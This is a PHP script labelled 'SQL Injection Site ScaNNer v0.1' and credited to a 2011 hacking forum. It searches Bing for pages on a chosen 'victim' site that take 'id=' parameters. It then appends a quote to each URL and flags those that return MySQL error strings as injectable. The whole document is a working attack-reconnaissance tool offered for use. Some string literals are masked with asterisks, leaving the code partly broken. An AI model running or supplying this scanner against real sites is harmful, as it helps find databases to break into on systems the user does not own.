PHP:
<?php
@set_time_limit(0);
@error_reporting(E_ALL | E_NOTICE);
if(!$_GET["target"]){
print_r("
================================================================================
USAGE : php sqli_site.php?target=www.victim.com
================================================================================
<form action= method=GET>
target:<input type=text size=17 name=target><br/>
<input type=submit value=send>
");
die();
}
function check_url($url,$source){ // By Lagripe-Dz !?
if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$source)) {
echo "[+] Found -> $url\n";
echo "<a href=".$url.">##</a><br/>";
}
else{ echo "[~] Not Found -> $url\n<br/>"; }
}
function check_sql_inj($site){
$result = @file_get_contents("$site%27");
check_url($site,$result);
}
function mystripos($haystack, $needle){
return strpos($haystack, stristr( $haystack, $needle ));
}
function sec($ent)
{
$bb = str_replace("http://", "", $ent);
$cc = str_replace("www.", "", $bb);
$dd = substr($cc, 0, mystripos($cc, "/"));
return $dd;
}
$npages = 50000;
$npage = 1;
$allLinks = array();
$target = $_GET["target"];
while($npage <= $npages)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://www.bing.com/search?q=site%3A' . $target . *****+id=&first=***** . $npage);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com/*****);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
$result['ERR'] = curl_error($ch);
curl_close($ch);
if ( empty( $result['ERR'] ) )
{
preg_match_all(*****(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $result['EXE'], $findlink);
for ($i = 0; $i < count($findlink[1]); $i++)
array_push($allLinks,$findlink[1][$i]);
$npage = $npage + 10;
if (preg_match(*****(first=***** . $npage . *****&)siU', $result['EXE'], $linksuiv) == 0)
break;
}
else
break;
}
$allDmns = array();
foreach ($allLinks as $kk => $vv){
$allDmns[] = $vv;
}
$resultPages = array_unique($allDmns);
sort($resultPages) ;
print_r("
#################################################################################
SQL Injection Site ScaNNer v0.1
Recoded By JetLi HKer
VBSpiDers.com
Sudan 2011 (r)
#################################################################################
");
for ($x = 0; $x < count($resultPages); $x++){
$h3h3 = $resultPages[$x];
check_sql_inj($h3h3);
}
print_r("
================================================================================
INFO / Site : ".$target." / Link scanned : ".count($resultPages)."
FINISHED
================================================================================
");
?>